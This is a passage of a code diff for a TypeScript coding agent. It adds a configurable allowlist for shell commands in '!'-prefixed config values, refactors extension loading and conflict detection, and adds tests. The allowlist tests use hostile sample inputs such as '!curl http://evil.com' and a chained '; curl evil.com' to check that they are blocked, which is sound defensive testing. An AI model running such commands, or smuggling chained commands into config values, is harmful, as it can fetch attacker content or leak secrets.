+				collectAutoThemeEntries(projectDirs.themes),
+				projectMetadata,
+				projectOverrides.themes,
+				projectBaseDir,
+			);
+		}
 
-		addResources(
-			"extensions",
-			collectAutoExtensionEntries(userDirs.extensions),
-			userMetadata,
-			userOverrides.extensions,
-			globalBaseDir,
-		);
-		addResources(
-			"skills",
-			[...collectAutoSkillEntries(userDirs.skills), ...collectAutoSkillEntries(userAgentsSkillsDir)],
-			userMetadata,
-			userOverrides.skills,
-			globalBaseDir,
-		);
-		addResources(
-			"prompts",
-			collectAutoPromptEntries(userDirs.prompts),
-			userMetadata,
-			userOverrides.prompts,
-			globalBaseDir,
-		);
-		addResources(
-			"themes",
-			collectAutoThemeEntries(userDirs.themes),
-			userMetadata,
-			userOverrides.themes,
-			globalBaseDir,
-		);
+		// User (global) resources
+		if (userSubdirs.has("extensions")) {
+			addResources(
+				"extensions",
+				collectAutoExtensionEntries(userDirs.extensions),
+				userMetadata,
+				userOverrides.extensions,
+				globalBaseDir,
+			);
+		}
+		{
+			// Ecosystem skills (~/.agents/skills/) take priority over legacy config-dir skills.
+			// Skip legacy dir entirely when migration has completed (marker file present).
+			const legacySkillsMigrated =
+				resolve(userDirs.skills) !== resolve(userAgentsSkillsDir) &&
+				existsSync(join(userDirs.skills, ".migrated-to-agents"));
+			const legacyUserSkillEntries =
+				!legacySkillsMigrated && userSubdirs.has("skills")
+					? collectAutoSkillEntries(userDirs.skills)
+					: [];
+			const skillEntries = [
+				...collectAutoSkillEntries(userAgentsSkillsDir),
+				...legacyUserSkillEntries,
+			];
+			if (skillEntries.length > 0) {
+				addResources("skills", skillEntries, userMetadata, userOverrides.skills, globalBaseDir);
+			}
+		}
+		if (userSubdirs.has("prompts")) {
+			addResources(
+				"prompts",
+				collectAutoPromptEntries(userDirs.prompts),
+				userMetadata,
+				userOverrides.prompts,
+				globalBaseDir,
+			);
+		}
+		if (userSubdirs.has("themes")) {
+			addResources(
+				"themes",
+				collectAutoThemeEntries(userDirs.themes),
+				userMetadata,
+				userOverrides.themes,
+				globalBaseDir,
+			);
+		}
 	}
 
 	private collectFilesFromPaths(paths: string[], resourceType: ResourceType): string[] {
diff --git a/packages/pi-coding-agent/src/core/resolve-config-value.test.ts b/packages/pi-coding-agent/src/core/resolve-config-value.test.ts
index 042e9e0ae..48a0f8f0e 100644
--- a/packages/pi-coding-agent/src/core/resolve-config-value.test.ts
+++ b/packages/pi-coding-agent/src/core/resolve-config-value.test.ts
@@ -1,9 +1,11 @@
-import { describe, it, beforeEach } from "node:test";
+import { describe, it, beforeEach, afterEach } from "node:test";
 import assert from "node:assert/strict";
 import {
 	resolveConfigValue,
 	clearConfigValueCache,
 	SAFE_COMMAND_PREFIXES,
+	setAllowedCommandPrefixes,
+	getAllowedCommandPrefixes,
 } from "./resolve-config-value.js";
 
 beforeEach(() => {
@@ -38,21 +40,20 @@ describe("resolveConfigValue — non-command values", () => {
 });
 
 describe("resolveConfigValue — command allowlist enforcement", () => {
-	it("blocks a disallowed command and returns undefined", () => {
+	it("blocks a disallowed command and returns undefined", (t) => {
 		const stderrChunks: string[] = [];
 		const originalWrite = process.stderr.write.bind(process.stderr);
 		process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => {
 			stderrChunks.push(chunk.toString());
 			return true;
 		};
-
-		try {
-			const result = resolveConfigValue("!curl http://evil.com");
-			assert.equal(result, undefined);
-			assert.ok(stderrChunks.some((line) => line.includes("curl")));
-		} finally {
+		t.after(() => {
 			process.stderr.write = originalWrite;
-		}
+		});
+
+		const result = resolveConfigValue("!curl http://evil.com");
+		assert.equal(result, undefined);
+		assert.ok(stderrChunks.some((line) => line.includes("curl")));
 	});
 
 	it("blocks another disallowed command (rm)", () => {
@@ -65,7 +66,7 @@ describe("resolveConfigValue — command allowlist enforcement", () => {
 		assert.equal(result, undefined);
 	});
 
-	it("allows a safe command prefix to proceed to execution", () => {
+	it("allows a safe command prefix to proceed to execution", (t) => {
 		// `pass` is unlikely to be installed in CI, so we just verify it does NOT
 		// return undefined due to the allowlist check — it may return undefined if
 		// the binary is absent, but the block path must not be taken.
@@ -76,16 +77,15 @@ describe("resolveConfigValue — command allowlist enforcement", () => {
 			stderrChunks.push(chunk.toString());
 			return true;
 		};
-
-		try {
-			resolveConfigValue("!pass show nonexistent-entry-for-test");
-			const blocked = stderrChunks.some((line) =>
-				line.includes("Blocked disallowed command")
-			);
-			assert.equal(blocked, false, "pass should not be blocked by the allowlist");
-		} finally {
+		t.after(() => {
 			process.stderr.write = originalWrite;
-		}
+		});
+
+		resolveConfigValue("!pass show nonexistent-entry-for-test");
+		const blocked = stderrChunks.some((line) =>
+			line.includes("Blocked disallowed command")
+		);
+		assert.equal(blocked, false, "pass should not be blocked by the allowlist");
 	});
 });
 
@@ -130,61 +130,166 @@ describe("resolveConfigValue — shell operator bypass prevention", () => {
 		assert.equal(result, undefined);
 	});
 
-	it("writes stderr warning when shell operators detected", () => {
+	it("writes stderr warning when shell operators detected", (t) => {
 		const stderrChunks: string[] = [];
 		const originalWrite = process.stderr.write.bind(process.stderr);
 		process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => {
 			stderrChunks.push(chunk.toString());
 			return true;
 		};
-
-		try {
-			resolveConfigValue("!pass show key; curl evil.com");
-			assert.ok(stderrChunks.some((line) => line.includes("shell operators")));
-		} finally {
+		t.after(() => {
 			process.stderr.write = originalWrite;
-		}
+		});
+
+		resolveConfigValue("!pass show key; curl evil.com");
+		assert.ok(stderrChunks.some((line) => line.includes("shell operators")));
 	});
 });
 
 describe("resolveConfigValue — caching", () => {
-	it("caches the result of a blocked command", () => {
+	it("caches the result of a blocked command", (t) => {
 		const callCount = { n: 0 };
 		const originalWrite = process.stderr.write.bind(process.stderr);
 		process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => {
 			callCount.n++;
 			return true;
 		};
-
-		try {
-			resolveConfigValue("!curl http://evil.com");
-			resolveConfigValue("!curl http://evil.com");
-			// The block warning should only fire once; the second call hits the cache
-			// before reaching the allowlist check, so stderr count is 1.
-			assert.equal(callCount.n, 1);
-		} finally {
+		t.after(() => {
 			process.stderr.write = originalWrite;
-		}
+		});
+
+		resolveConfigValue("!curl http://evil.com");
+		resolveConfigValue("!curl http://evil.com");
+		// The block warning should only fire once; the second call hits the cache
+		// before reaching the allowlist check, so stderr count is 1.
+		assert.equal(callCount.n, 1);
 	});
 
-	it("clearConfigValueCache resets cached entries", () => {
+	it("clearConfigValueCache resets cached entries", (t) => {
 		const stderrChunks: string[] = [];
 		const originalWrite = process.stderr.write.bind(process.stderr);
 		process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => {
 			stderrChunks.push(chunk.toString());
 			return true;
 		};
-
-		try {
-			resolveConfigValue("!curl http://evil.com");
-			assert.equal(stderrChunks.length, 1);
-
-			clearConfigValueCache();
-
-			resolveConfigValue("!curl http://evil.com");
-			assert.equal(stderrChunks.length, 2);
-		} finally {
+		t.after(() => {
 			process.stderr.write = originalWrite;
-		}
+		});
+
+		resolveConfigValue("!curl http://evil.com");
+		assert.equal(stderrChunks.length, 1);
+
+		clearConfigValueCache();
+
+		resolveConfigValue("!curl http://evil.com");
+		assert.equal(stderrChunks.length, 2);
+	});
+});
+
+describe("REGRESSION #666: non-default credential tool blocked with no override", () => {
+	afterEach(() => {
+		setAllowedCommandPrefixes(SAFE_COMMAND_PREFIXES);
+		clearConfigValueCache();
+	});
+
+	it("sops is blocked by default, then unblocked by setAllowedCommandPrefixes", (t) => {
+		const stderrChunks: string[] = [];
+		const originalWrite = process.stderr.write.bind(process.stderr);
+		process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => {
+			stderrChunks.push(chunk.toString());
+			return true;
+		};
+		t.after(() => {
+			process.stderr.write = originalWrite;
+		});
+
+		// Bug: sops is not in SAFE_COMMAND_PREFIXES, so it's blocked
+		const result = resolveConfigValue("!sops decrypt --output-type json secrets.enc.json");
+		assert.equal(result, undefined, "sops is blocked by the hardcoded allowlist");
+		assert.ok(
+			stderrChunks.some((line) => line.includes('Blocked disallowed command: "sops"')),
+			"should log a block message for sops",
+		);
+
+		stderrChunks.length = 0;
+		clearConfigValueCache();
+
+		// Fix: override the allowlist to include sops
+		setAllowedCommandPrefixes([...SAFE_COMMAND_PREFIXES, "sops"]);
+		resolveConfigValue("!sops decrypt --output-type json secrets.enc.json");
+
+		const blockedAfterOverride = stderrChunks.some((line) =>
+			line.includes("Blocked disallowed command"),
+		);
+		assert.equal(blockedAfterOverride, false, "sops must not be blocked after override");
+	});
+});
+
+describe("setAllowedCommandPrefixes — user override", () => {
+	afterEach(() => {
+		setAllowedCommandPrefixes(SAFE_COMMAND_PREFIXES);
+		clearConfigValueCache();
+	});
+
+	it("overrides built-in prefixes with custom list", () => {
+		setAllowedCommandPrefixes(["sops", "doppler"]);
+		assert.deepEqual([...getAllowedCommandPrefixes()], ["sops", "doppler"]);
+	});
+
+	it("custom prefix is allowed through to execution", (t) => {
+		const stderrChunks: string[] = [];
+		const originalWrite = process.stderr.write.bind(process.stderr);
+		process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => {
+			stderrChunks.push(chunk.toString());
+			return true;
+		};
+		t.after(() => {
+			process.stderr.write = originalWrite;
+		});
+
+		setAllowedCommandPrefixes(["mycli"]);
+		resolveConfigValue("!mycli get-secret");
+		const blocked = stderrChunks.some((line) => line.includes("Blocked disallowed command"));
+		assert.equal(blocked, false, "mycli should not be blocked when in the custom allowlist");
+	});
+
+	it("previously-allowed prefix is blocked after override", (t) => {
+		const stderrChunks: string[] = [];
+		const originalWrite = process.stderr.write.bind(process.stderr);
+		process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => {
+			stderrChunks.push(chunk.toString());
+			return true;
+		};
+		t.after(() => {
+			process.stderr.write = originalWrite;
+		});
+
+		setAllowedCommandPrefixes(["sops"]);
+		const result = resolveConfigValue("!pass show secret");
+		assert.equal(result, undefined);
+		const blocked = stderrChunks.some((line) => line.includes("Blocked disallowed command"));
+		assert.equal(blocked, true, "pass should be blocked when not in the custom allowlist");
+	});
+
+	it("clears cache when overriding prefixes", (t) => {
+		const stderrChunks: string[] = [];
+		const originalWrite = process.stderr.write.bind(process.stderr);
+		process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => {
+			stderrChunks.push(chunk.toString());
+			return true;
+		};
+		t.after(() => {
+			process.stderr.write = originalWrite;
+		});
+
+		resolveConfigValue("!mycli get-secret");
+		assert.ok(stderrChunks.some((line) => line.includes("Blocked")));
+
+		stderrChunks.length = 0;
+
+		setAllowedCommandPrefixes(["mycli"]);
+		resolveConfigValue("!mycli get-secret");
+		const blocked = stderrChunks.some((line) => line.includes("Blocked"));
+		assert.equal(blocked, false, "Should re-evaluate after allowlist change");
 	});
 });
diff --git a/packages/pi-coding-agent/src/core/resolve-config-value.ts b/packages/pi-coding-agent/src/core/resolve-config-value.ts
index e12c4c2ae..9b72ca65f 100644
--- a/packages/pi-coding-agent/src/core/resolve-config-value.ts
+++ b/packages/pi-coding-agent/src/core/resolve-config-value.ts
@@ -24,6 +24,30 @@ export const SAFE_COMMAND_PREFIXES = [
 	"lpass",
 ];
 
+/**
+ * Active command prefix allowlist. Defaults to SAFE_COMMAND_PREFIXES but can be
+ * overridden via setAllowedCommandPrefixes() (called from settings or env var).
+ */
+let activeCommandPrefixes: string[] = SAFE_COMMAND_PREFIXES;
+
+/**
+ * Replace the active command prefix allowlist.
+ * Called during initialization when the user has configured `allowedCommandPrefixes`
+ * in global settings.json or via the GSD_ALLOWED_COMMAND_PREFIXES env var.
+ */
+export function setAllowedCommandPrefixes(prefixes: string[]): void {
+	if (prefixes.length === 0) {
+		process.stderr.write("[resolve-config-value] Warning: empty command prefix allowlist — all !commands will be blocked\n");
+	}
+	activeCommandPrefixes = prefixes;
+	clearConfigValueCache();
+}
+
+/** Get the currently active command prefix allowlist. */
+export function getAllowedCommandPrefixes(): readonly string[] {
+	return activeCommandPrefixes;
+}
+
 /**
  * Resolve a config value (API key, header value, etc.) to an actual value.
  * - If starts with "!", executes the rest as a shell command and uses stdout (cached)
@@ -45,8 +69,8 @@ function executeCommand(commandConfig: string): string | undefined {
 	const command = commandConfig.slice(1);
 	const tokens = command.split(/\s+/).filter(Boolean);
 	const firstToken = tokens[0];
-	if (!SAFE_COMMAND_PREFIXES.includes(firstToken)) {
-		process.stderr.write(`[resolve-config-value] Blocked disallowed command: "${firstToken}". Allowed: ${SAFE_COMMAND_PREFIXES.join(", ")}\n`);
+	if (!activeCommandPrefixes.includes(firstToken)) {
+		process.stderr.write(`[resolve-config-value] Blocked disallowed command: "${firstToken}". Allowed: ${activeCommandPrefixes.join(", ")}\n`);
 		commandResultCache.set(commandConfig, undefined);
 		return undefined;
 	}
diff --git a/packages/pi-coding-agent/src/core/resource-loader-cache-reset.test.ts b/packages/pi-coding-agent/src/core/resource-loader-cache-reset.test.ts
new file mode 100644
index 000000000..f59c557a7
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/resource-loader-cache-reset.test.ts
@@ -0,0 +1,42 @@
+// GSD-2 — Regression test for #3616: reload() must reset jiti extension loader cache
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import test, { describe } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+const source = readFileSync(
+	join(process.cwd(), "packages/pi-coding-agent/src/core/resource-loader.ts"),
+	"utf-8",
+);
+
+describe("#3616 — reload() must invalidate jiti module cache", () => {
+	test("resource-loader imports resetExtensionLoaderCache from loader.js", () => {
+		assert.ok(
+			source.includes("resetExtensionLoaderCache"),
+			"resource-loader.ts should import resetExtensionLoaderCache",
+		);
+		assert.ok(
+			source.includes('from "./extensions/loader.js"'),
+			"resetExtensionLoaderCache should be imported from extensions/loader.js",
+		);
+	});
+
+	test("reload() calls resetExtensionLoaderCache before loadExtensions", () => {
+		const reloadStart = source.indexOf("async reload(): Promise<void>");
+		assert.ok(reloadStart >= 0, "should find reload() method");
+		const reloadBody = source.slice(reloadStart, reloadStart + 4000);
+
+		const resetIdx = reloadBody.indexOf("resetExtensionLoaderCache()");
+		assert.ok(resetIdx >= 0, "reload() should call resetExtensionLoaderCache()");
+
+		const loadIdx = reloadBody.indexOf("loadExtensions(");
+		assert.ok(loadIdx >= 0, "reload() should call loadExtensions");
+
+		assert.ok(
+			resetIdx < loadIdx,
+			"resetExtensionLoaderCache() must be called BEFORE loadExtensions to ensure fresh modules",
+		);
+	});
+});
diff --git a/packages/pi-coding-agent/src/core/resource-loader.ts b/packages/pi-coding-agent/src/core/resource-loader.ts
index c8c1c048c..34ab7565e 100644
--- a/packages/pi-coding-agent/src/core/resource-loader.ts
+++ b/packages/pi-coding-agent/src/core/resource-loader.ts
@@ -1,6 +1,6 @@
 import { existsSync, readdirSync, readFileSync, statSync } from "node:fs";
 import { homedir } from "node:os";
-import { join, resolve, sep } from "node:path";
+import { basename, dirname, join, relative, resolve, sep } from "node:path";
 import chalk from "chalk";
 import { CONFIG_DIR_NAME, getAgentDir } from "../config.js";
 import { loadThemeFromPath, type Theme } from "../modes/interactive/theme/theme.js";
@@ -9,7 +9,7 @@ import type { ResourceCollision, ResourceDiagnostic } from "./diagnostics.js";
 export type { ResourceCollision, ResourceDiagnostic } from "./diagnostics.js";
 
 import { createEventBus, type EventBus } from "./event-bus.js";
-import { createExtensionRuntime, loadExtensionFromFactory, loadExtensions } from "./extensions/loader.js";
+import { createExtensionRuntime, loadExtensionFromFactory, loadExtensions, resetExtensionLoaderCache } from "./extensions/loader.js";
 import type { Extension, ExtensionFactory, ExtensionRuntime, LoadExtensionsResult } from "./extensions/types.js";
 import { DefaultPackageManager, type PathMetadata } from "./package-manager.js";
 import type { PromptTemplate } from "./prompt-templates.js";
@@ -121,12 +121,21 @@ export interface DefaultResourceLoaderOptions {
 	additionalPromptTemplatePaths?: string[];
 	additionalThemePaths?: string[];
 	extensionFactories?: ExtensionFactory[];
+	bundledExtensionKeys?: Set<string>;
 	noExtensions?: boolean;
 	noSkills?: boolean;
 	noPromptTemplates?: boolean;
 	noThemes?: boolean;
 	systemPrompt?: string;
 	appendSystemPrompt?: string;
+	/** Names of bundled extensions (used to identify built-in extensions in conflict detection). */
+	bundledExtensionNames?: Set<string>;
+	/**
+	 * Transform extension paths before loading. Receives the merged list of all
+	 * discovered extension paths and returns a (possibly reordered/filtered) list.
+	 * Use this to apply dependency sorting or registry-based filtering.
+	 */
+	extensionPathsTransform?: (paths: string[]) => { paths: string[]; diagnostics?: string[] };
 	extensionsOverride?: (base: LoadExtensionsResult) => LoadExtensionsResult;
 	skillsOverride?: (base: { skills: Skill[]; diagnostics: ResourceDiagnostic[] }) => {
 		skills: Skill[];
@@ -153,6 +162,7 @@ export class DefaultResourceLoader implements ResourceLoader {
 	private settingsManager: SettingsManager;
 	private eventBus: EventBus;
 	private packageManager: DefaultPackageManager;
+	private bundledExtensionKeys: Set<string>;
 	private additionalExtensionPaths: string[];
 	private additionalSkillPaths: string[];
 	private additionalPromptTemplatePaths: string[];
@@ -164,6 +174,8 @@ export class DefaultResourceLoader implements ResourceLoader {
 	private noThemes: boolean;
 	private systemPromptSource?: string;
 	private appendSystemPromptSource?: string;
+	private bundledExtensionNames: Set<string>;
+	private extensionPathsTransform?: (paths: string[]) => { paths: string[]; diagnostics?: string[] };
 	private extensionsOverride?: (base: LoadExtensionsResult) => LoadExtensionsResult;
 	private skillsOverride?: (base: { skills: Skill[]; diagnostics: ResourceDiagnostic[] }) => {
 		skills: Skill[];
@@ -208,6 +220,7 @@ export class DefaultResourceLoader implements ResourceLoader {
 			agentDir: this.agentDir,
 			settingsManager: this.settingsManager,
 		});
+		this.bundledExtensionKeys = options.bundledExtensionKeys ?? new Set();
 		this.additionalExtensionPaths = options.additionalExtensionPaths ?? [];
 		this.additionalSkillPaths = options.additionalSkillPaths ?? [];
 		this.additionalPromptTemplatePaths = options.additionalPromptTemplatePaths ?? [];
@@ -219,6 +232,8 @@ export class DefaultResourceLoader implements ResourceLoader {
 		this.noThemes = options.noThemes ?? false;
 		this.systemPromptSource = options.systemPrompt;
 		this.appendSystemPromptSource = options.appendSystemPrompt;
+		this.bundledExtensionNames = options.bundledExtensionNames ?? new Set();
+		this.extensionPathsTransform = options.extensionPathsTransform;
 		this.extensionsOverride = options.extensionsOverride;
 		this.skillsOverride = options.skillsOverride;
 		this.promptsOverride = options.promptsOverride;
@@ -305,6 +320,10 @@ export class DefaultResourceLoader implements ResourceLoader {
 	}
 
 	async reload(): Promise<void> {
+		// Invalidate the shared jiti module cache so updated extension code
+		// on disk is re-compiled instead of served from the stale cache (#3616).
+		resetExtensionLoaderCache();
+
 		const resolvedPaths = await this.packageManager.resolve();
 		const cliExtensionPaths = await this.packageManager.resolveExtensionSources(this.additionalExtensionPaths, {
 			temporary: true,
@@ -374,10 +393,21 @@ export class DefaultResourceLoader implements ResourceLoader {
 		const cliEnabledPrompts = getEnabledPaths(cliExtensionPaths.prompts);
 		const cliEnabledThemes = getEnabledPaths(cliExtensionPaths.themes);
 
-		const extensionPaths = this.noExtensions
+		let extensionPaths = this.noExtensions
 			? cliEnabledExtensions
 			: this.mergePaths(cliEnabledExtensions, enabledExtensions);
 
+		// Apply path transform (dependency sorting, registry filtering) if provided
+		if (this.extensionPathsTransform) {
+			const transformed = this.extensionPathsTransform(extensionPaths);
+			extensionPaths = transformed.paths;
+			if (transformed.diagnostics?.length) {
+				for (const msg of transformed.diagnostics) {
+					process.stderr.write(`[extensions] ${msg}\n`);
+				}
+			}
+		}
+
 		const extensionsResult = await loadExtensions(extensionPaths, this.cwd, this.eventBus);
 		const inlineExtensions = await this.loadExtensionFactories(extensionsResult.runtime);
 		extensionsResult.extensions.push(...inlineExtensions.extensions);
@@ -790,66 +820,110 @@ export class DefaultResourceLoader implements ResourceLoader {
 		return target.startsWith(prefix);
 	}
 
+	/**
+	 * Extract the extension name from its path.
+	 * For root-level files: basename without extension (e.g. "search-the-web.ts" → "search-the-web")
+	 * For subdirectory extensions: the directory name (e.g. "/path/to/gsd/index.ts" → "gsd")
+	 */
+	private getExtensionNameFromPath(extPath: string): string {
+		const base = basename(extPath);
+		if (base === "index.js" || base === "index.ts") {
+			return basename(dirname(extPath));
+		}
+		return base.replace(/\.(?:ts|js)$/, "");
+	}
+
 	private detectExtensionConflicts(extensions: Extension[]): Array<{ path: string; message: string }> {
-		const conflicts: Array<{ path: string; message: string }> = [];
+		return detectExtensionConflicts(extensions, this.bundledExtensionKeys, join(this.agentDir, "extensions"));
+	}
+}
 
-		// Track which extension registered each tool, command, and flag
-		const toolOwners = new Map<string, string>();
-		const commandOwners = new Map<string, string>();
-		const flagOwners = new Map<string, string>();
+/**
+ * Extract the extension directory name (key) from a full extension path.
+ * Given extensionsDir `/home/user/.gsd/agent/extensions` and
+ * ownerPath `/home/user/.gsd/agent/extensions/mcp-client/index.js`,
+ * returns `"mcp-client"`.  Returns `undefined` when the path is not
+ * under extensionsDir.
+ */
+export function extractExtensionKey(ownerPath: string, extensionsDir: string): string | undefined {
+	const normalizedDir = resolve(extensionsDir);
+	const normalizedPath = resolve(ownerPath);
+	const prefix = normalizedDir.endsWith(sep) ? normalizedDir : `${normalizedDir}${sep}`;
+	if (!normalizedPath.startsWith(prefix)) {
+		return undefined;
+	}
+	const relPath = relative(normalizedDir, normalizedPath);
+	const firstSegment = relPath.split(/[\\/]/)[0];
+	return firstSegment?.replace(/\.(?:ts|js)$/, "") || undefined;
+}
 
-		for (const ext of extensions) {
-			// Check tools
-			for (const toolName of ext.tools.keys()) {
-				const existingOwner = toolOwners.get(toolName);
-				if (existingOwner && existingOwner !== ext.path) {
-					// Determine if the existing owner is a built-in (not a user extension)
-					const isBuiltIn = !existingOwner.includes("/.gsd/agent/extensions/") &&
-						!existingOwner.includes("/.gsd/extensions/");
-					const hint = isBuiltIn
-						? ` (built-in tool supersedes — consider removing ${ext.path})`
-						: "";
-					conflicts.push({
-						path: ext.path,
-						message: `Tool "${toolName}" conflicts with ${existingOwner}${hint}`,
-					});
-				} else {
-					toolOwners.set(toolName, ext.path);
-				}
-			}
+/**
+ * Detect tool/command/flag name collisions across loaded extensions.
+ *
+ * When the first-registered owner of a name is a bundled extension
+ * (its key appears in `bundledExtensionKeys`), the conflict message
+ * includes a "supersedes" hint so downstream display can downgrade the
+ * severity from "Extension load error" to "Extension conflict".
+ */
+export function detectExtensionConflicts(
+	extensions: Extension[],
+	bundledExtensionKeys: Set<string>,
+	extensionsDir: string,
+): Array<{ path: string; message: string }> {
+	const conflicts: Array<{ path: string; message: string }> = [];
 
-			// Check commands
-			for (const commandName of ext.commands.keys()) {
-				const existingOwner = commandOwners.get(commandName);
-				if (existingOwner && existingOwner !== ext.path) {
-					const isBuiltIn = !existingOwner.includes("/.gsd/agent/extensions/") &&
-						!existingOwner.includes("/.gsd/extensions/");
-					const hint = isBuiltIn
-						? ` (built-in command supersedes — consider removing ${ext.path})`
-						: "";
-					conflicts.push({
-						path: ext.path,
-						message: `Command "/${commandName}" conflicts with ${existingOwner}${hint}`,
-					});
-				} else {
-					commandOwners.set(commandName, ext.path);
-				}
-			}
+	const toolOwners = new Map<string, string>();
+	const commandOwners = new Map<string, string>();
+	const flagOwners = new Map<string, string>();
 
-			// Check flags
-			for (const flagName of ext.flags.keys()) {
-				const existingOwner = flagOwners.get(flagName);
-				if (existingOwner && existingOwner !== ext.path) {
-					conflicts.push({
-						path: ext.path,
-						message: `Flag "--${flagName}" conflicts with ${existingOwner}`,
-					});
-				} else {
-					flagOwners.set(flagName, ext.path);
-				}
+	const isBundled = (ownerPath: string): boolean => {
+		const key = extractExtensionKey(ownerPath, extensionsDir);
+		return key !== undefined && bundledExtensionKeys.has(key);
+	};
+
+	for (const ext of extensions) {
+		for (const toolName of ext.tools.keys()) {
+			const existingOwner = toolOwners.get(toolName);
+			if (existingOwner && existingOwner !== ext.path) {
+				const hint = isBundled(existingOwner)
+					? ` (built-in tool supersedes — consider removing ${ext.path})`
+					: "";
+				conflicts.push({
+					path: ext.path,
+					message: `Tool "${toolName}" conflicts with ${existingOwner}${hint}`,
+				});
+			} else {
+				toolOwners.set(toolName, ext.path);
 			}
 		}
 
-		return conflicts;
+		for (const commandName of ext.commands.keys()) {
+			const existingOwner = commandOwners.get(commandName);
+			if (existingOwner && existingOwner !== ext.path) {
+				const hint = isBundled(existingOwner)
+					? ` (built-in command supersedes — consider removing ${ext.path})`
+					: "";
+				conflicts.push({
+					path: ext.path,
+					message: `Command "/${commandName}" conflicts with ${existingOwner}${hint}`,
+				});
+			} else {
+				commandOwners.set(commandName, ext.path);
+			}
+		}
+
+		for (const flagName of ext.flags.keys()) {
+			const existingOwner = flagOwners.get(flagName);
+			if (existingOwner && existingOwner !== ext.path) {
+				conflicts.push({
+					path: ext.path,
+					message: `Flag "--${flagName}" conflicts with ${existingOwner}`,
+				});
+			} else {
+				flagOwners.set(flagName, ext.path);
+			}
+		}
 	}
+
+	return conflicts;
 }
diff --git a/packages/pi-coding-agent/src/core/retry-handler.test.ts b/packages/pi-coding-agent/src/core/retry-handler.test.ts
new file mode 100644
index 000000000..5cd324401
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/retry-handler.test.ts
@@ -0,0 +1,431 @@
+/**
+ * RetryHandler tests — long-context entitlement 429 error handling (#2803)
+ *
+ * Verifies that "Extra usage is required for long context requests" errors
+ * are classified as quota_exhausted (not rate_limit) and trigger a model
+ * downgrade from [1m] to base when no cross-provider fallback exists.
+ */
+
+import { describe, it, beforeEach, mock, type Mock } from "node:test";
+import assert from "node:assert/strict";
+import { RetryHandler, type RetryHandlerDeps } from "./retry-handler.js";
+import type { Api, AssistantMessage, Model } from "@gsd/pi-ai";
+import type { FallbackResolver } from "./fallback-resolver.js";
+import type { ModelRegistry } from "./model-registry.js";
+import type { SettingsManager } from "./settings-manager.js";
+
+// ─── Helpers ────────────────────────────────────────────────────────────────
+
+function createMockModel(provider: string, id: string): Model<Api> {
+	return {
+		id,
+		name: id,
+		api: "anthropic" as Api,
+		provider,
+		baseUrl: "https://api.anthropic.com",
+		reasoning: false,
+		input: ["text"],
+		cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
+		contextWindow: 1_000_000,
+		maxTokens: 16384,
+	} as Model<Api>;
+}
+
+function errorMessage(msg: string): AssistantMessage {
+	return {
+		role: "assistant",
+		content: [],
+		api: "anthropic-messages",
+		provider: "anthropic",
+		model: "claude-opus-4-6[1m]",
+		usage: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, totalTokens: 0, cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 } },
+		stopReason: "error",
+		errorMessage: msg,
+		timestamp: Date.now(),
+	} as AssistantMessage;
+}
+
+interface MockDeps {
+	deps: RetryHandlerDeps;
+	emittedEvents: Array<Record<string, any>>;
+	continueFn: Mock<() => Promise<void>>;
+	onModelChangeFn: Mock<(model: Model<any>) => void>;
+	markUsageLimitReached: Mock<(...args: any[]) => boolean>;
+	findFallback: Mock<(...args: any[]) => Promise<any>>;
+	findModel: Mock<(provider: string, modelId: string) => Model<Api> | undefined>;
+}
+
+function createMockDeps(overrides?: {
+	model?: Model<Api>;
+	retryEnabled?: boolean;
+	markUsageLimitReachedResult?: boolean;
+	fallbackResult?: any;
+	findModelResult?: (provider: string, modelId: string) => Model<Api> | undefined;
+	retrySettings?: {
+		maxRetries?: number;
+		baseDelayMs?: number;
+		maxDelayMs?: number;
+	};
+}): MockDeps {
+	const model = overrides?.model ?? createMockModel("anthropic", "claude-opus-4-6[1m]");
+	const emittedEvents: Array<Record<string, any>> = [];
+	const continueFn = mock.fn(async () => {});
+	const onModelChangeFn = mock.fn((_model: Model<any>) => {});
+	const markUsageLimitReached = mock.fn(
+		() => overrides?.markUsageLimitReachedResult ?? false,
+	);
+	const findFallback = mock.fn(async () => overrides?.fallbackResult ?? null);
+	const findModel = mock.fn(
+		overrides?.findModelResult ?? ((_provider: string, _modelId: string) => undefined),
+	);
+
+	const messages: Array<{ role: string } & Record<string, any>> = [];
+
+	const deps: RetryHandlerDeps = {
+		agent: {
+			continue: continueFn,
+			state: { messages },
+			setModel: mock.fn(),
+			replaceMessages: mock.fn((newMessages: any[]) => {
+				messages.length = 0;
+				messages.push(...newMessages);
+			}),
+		} as any,
+		settingsManager: {
+			getRetryEnabled: () => overrides?.retryEnabled ?? true,
+			getRetrySettings: () => ({
+				enabled: overrides?.retryEnabled ?? true,
+				maxRetries: overrides?.retrySettings?.maxRetries ?? 5,
+				baseDelayMs: overrides?.retrySettings?.baseDelayMs ?? 1000,
+				maxDelayMs: overrides?.retrySettings?.maxDelayMs ?? 30000,
+			}),
+		} as unknown as SettingsManager,
+		modelRegistry: {
+			authStorage: {
+				markUsageLimitReached,
+			},
+			find: findModel,
+		} as unknown as ModelRegistry,
+		fallbackResolver: {
+			findFallback,
+		} as unknown as FallbackResolver,
+		getModel: () => model,
+		getSessionId: () => "test-session",
+		emit: (event: any) => emittedEvents.push(event),
+		onModelChange: onModelChangeFn,
+	};
+
+	return { deps, emittedEvents, continueFn, onModelChangeFn, markUsageLimitReached, findFallback, findModel };
+}
+
+// ─── _classifyErrorType (tested via handleRetryableError behavior) ──────────
+
+describe("RetryHandler — long-context entitlement 429 (#2803)", () => {
+
+	describe("error classification", () => {
+		it("classifies 'Extra usage is required for long context requests' as quota_exhausted, not rate_limit", async () => {
+			// When the error is classified as quota_exhausted AND no alternate credentials
+			// AND no fallback, the handler should emit fallback_chain_exhausted and stop.
+			// If misclassified as rate_limit, it would enter the backoff loop instead.
